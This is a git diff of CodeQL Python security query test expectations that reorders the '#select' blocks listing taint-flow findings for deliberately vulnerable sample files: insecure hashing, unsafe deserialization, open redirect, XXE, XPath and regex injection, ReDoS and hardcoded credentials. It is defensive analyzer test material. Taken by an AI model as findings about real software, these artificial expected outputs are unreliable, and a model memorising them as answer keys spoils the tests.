for ImportMember | Sensitive data (password) | +| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | +| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | +| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | Sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected index 309ef858d3b4..bab1e34c912b 100644 --- a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected +++ b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected @@ -1,9 +1,3 @@ -#select -| unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | edges | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for request | provenance | | | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for request | unsafe_deserialization.py:14:15:14:21 | ControlFlowNode for request | provenance | | @@ -28,3 +22,9 @@ nodes | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | semmle.label | ControlFlowNode for payload | | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | semmle.label | ControlFlowNode for payload | subpaths +#select +| unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected index 3e43c112e2a3..551299a64dc4 100644 --- a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected +++ b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected @@ -1,16 +1,3 @@ -#select -| test.py:8:21:8:26 | ControlFlowNode for target | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:8:21:8:26 | ControlFlowNode for target | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:32:21:32:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:32:21:32:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:39:21:39:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:39:21:39:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:46:21:46:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:46:21:46:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:62:21:62:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:62:21:62:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:69:21:69:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:69:21:69:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:76:21:76:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:76:21:76:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:83:21:83:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:83:21:83:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:93:18:93:26 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:93:18:93:26 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:114:25:114:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:114:25:114:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:140:25:140:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:140:25:140:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:148:25:148:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:148:25:148:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:1:26:1:32 | ControlFlowNode for request | provenance | | | test.py:1:26:1:32 | ControlFlowNode for request | test.py:7:14:7:20 | ControlFlowNode for request | provenance | | @@ -151,3 +138,16 @@ nodes | test.py:145:17:145:46 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:148:25:148:33 | ControlFlowNode for untrusted | semmle.label | ControlFlowNode for untrusted | subpaths +#select +| test.py:8:21:8:26 | ControlFlowNode for target | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:8:21:8:26 | ControlFlowNode for target | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:32:21:32:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:32:21:32:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:39:21:39:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:39:21:39:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:46:21:46:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:46:21:46:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:62:21:62:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:62:21:62:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:69:21:69:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:69:21:69:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:76:21:76:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:76:21:76:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:83:21:83:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:83:21:83:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:93:18:93:26 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:93:18:93:26 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:114:25:114:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:114:25:114:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:140:25:140:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:140:25:140:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:148:25:148:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:148:25:148:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected index 11c3ec1b5221..b33d39f50718 100644 --- a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected +++ b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected @@ -1,6 +1,3 @@ -#select -| test.py:10:34:10:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:10:34:10:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:31:34:31:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:31:34:31:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:1:26:1:32 | ControlFlowNode for request | provenance | | | test.py:1:26:1:32 | ControlFlowNode for request | test.py:9:19:9:25 | ControlFlowNode for request | provenance | | @@ -19,3 +16,6 @@ nodes | test.py:20:19:20:25 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | test.py:31:34:31:44 | ControlFlowNode for xml_content | semmle.label | ControlFlowNode for xml_content | subpaths +#select +| test.py:10:34:10:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:10:34:10:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:31:34:31:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:31:34:31:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected index 6c13896e7884..4b1a2c40f7cf 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected @@ -1,10 +1,3 @@ -#select -| xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | XPath expression depends on a $@. | xpathBad.py:9:7:9:13 | ControlFlowNode for request | user-provided value | -| xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:10:5:10:9 | ControlFlowNode for value | provenance | AdditionalTaintStep | | xpathBad.py:10:5:10:9 | ControlFlowNode for value | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | provenance | | @@ -66,3 +59,10 @@ nodes | xpathFlow.py:47:18:47:44 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | semmle.label | ControlFlowNode for xpathQuery | subpaths +#select +| xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | XPath expression depends on a $@. | xpathBad.py:9:7:9:13 | ControlFlowNode for request | user-provided value | +| xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected index 22fcfd05fa19..aa8cea07ed16 100644 --- a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected +++ b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected @@ -1,9 +1,3 @@ -#select -| test.py:8:30:8:33 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:8:30:8:33 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:8:19:8:21 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:9:32:9:35 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:9:32:9:35 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with '0.9' and with many repetitions of '99'. | test.py:9:25:9:27 | \\d+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:12:17:12:20 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:12:17:12:20 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:11:29:11:31 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:16:24:16:30 | ControlFlowNode for my_text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:16:24:16:30 | ControlFlowNode for my_text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:18:21:18:23 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:21:18:21:21 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:21:18:21:21 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | test.py:20:271:20:272 | .* | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:2:26:2:32 | ControlFlowNode for request | provenance | | | test.py:2:26:2:32 | ControlFlowNode for request | test.py:7:12:7:18 | ControlFlowNode for request | provenance | | @@ -32,3 +26,9 @@ nodes | test.py:18:28:18:31 | ControlFlowNode for text | semmle.label | ControlFlowNode for text | | test.py:21:18:21:21 | ControlFlowNode for text | semmle.label | ControlFlowNode for text | subpaths +#select +| test.py:8:30:8:33 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:8:30:8:33 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:8:19:8:21 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:9:32:9:35 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:9:32:9:35 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with '0.9' and with many repetitions of '99'. | test.py:9:25:9:27 | \\d+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:12:17:12:20 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:12:17:12:20 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:11:29:11:31 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:16:24:16:30 | ControlFlowNode for my_text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:16:24:16:30 | ControlFlowNode for my_text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:18:21:18:23 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:21:18:21:21 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:21:18:21:21 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | test.py:20:271:20:272 | .* | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-730-RegexInjection/RegexInjection.expected b/python/ql/test/query-tests/Security/CWE-730-RegexInjection/RegexInjection.expected index 5a5a48f94560..16d29401f785 100644 --- a/python/ql/test/query-tests/Security/CWE-730-RegexInjection/RegexInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-730-RegexInjection/RegexInjection.expected @@ -1,7 +1,3 @@ -#select -| re_bad.py:14:15:14:28 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:14:15:14:28 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:14:5:14:33 | ControlFlowNode for Attribute() | re.search | -| re_bad.py:25:35:25:48 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:25:35:25:48 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:26:5:26:31 | ControlFlowNode for Attribute() | re.search | -| re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:37:5:37:41 | ControlFlowNode for Attribute() | re.search | edges | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | | re_bad.py:1:19:1:25 | ControlFlowNode for request | re_bad.py:13:22:13:28 | ControlFlowNode for request | provenance | | @@ -26,3 +22,7 @@ nodes | re_bad.py:36:22:36:28 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | semmle.label | ControlFlowNode for unsafe_pattern | subpaths +#select +| re_bad.py:14:15:14:28 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:14:15:14:28 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:14:5:14:33 | ControlFlowNode for Attribute() | re.search | +| re_bad.py:25:35:25:48 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:25:35:25:48 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:26:5:26:31 | ControlFlowNode for Attribute() | re.search | +| re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:37:5:37:41 | ControlFlowNode for Attribute() | re.search | diff --git a/python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected b/python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected +++ b/python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/python/ql/test/query-tests/Security/CWE-798-HardcodedCredentials/HardcodedCredentials.expected b/python/ql/test/query-tests/Security/CWE-798-HardcodedCredentials/HardcodedCredentials.expected index 1774d4a8387c..7fe70dd495b2 100644 --- a/python/ql/test/query-tests/Security/CWE-798-HardcodedCredentials/HardcodedCredentials.expected +++ b/python/ql/test/query-tests/Security/CWE-798-HardcodedCredentials/HardcodedCredentials.expected @@ -1,6 +1,3 @@ -#select -| test.py:5:12:5:24 | ControlFlowNode for StringLiteral 